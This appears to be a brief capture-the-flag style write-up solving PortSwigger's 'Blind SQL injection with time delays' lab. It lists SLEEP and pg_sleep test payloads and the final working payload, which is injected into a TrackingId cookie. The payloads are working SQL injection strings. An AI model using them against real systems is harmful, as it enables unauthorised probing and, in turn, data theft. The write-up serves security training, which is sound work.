Skip to content

Port Swigger Blind SQL injection with time delays

Blind SQL injection with time delays

Solution

Open website: https://0a0d005303cfc13283d791a800150071.web-security-academy.net/

https://0a0d005303cfc13283d791a800150071.web-security-academy.net/

Database engine testing

Used payloads:
'||(SELECT SLEEP(3))--
'||(SELECT pg_sleep(3))--

Exploit: SQLi Blind with time delays

Payload:
'||(SELECT pg_sleep(10))--

Cookie: TrackingId=kyuBL819bcRYDn9o'||(SELECT pg_sleep(10))--

Solved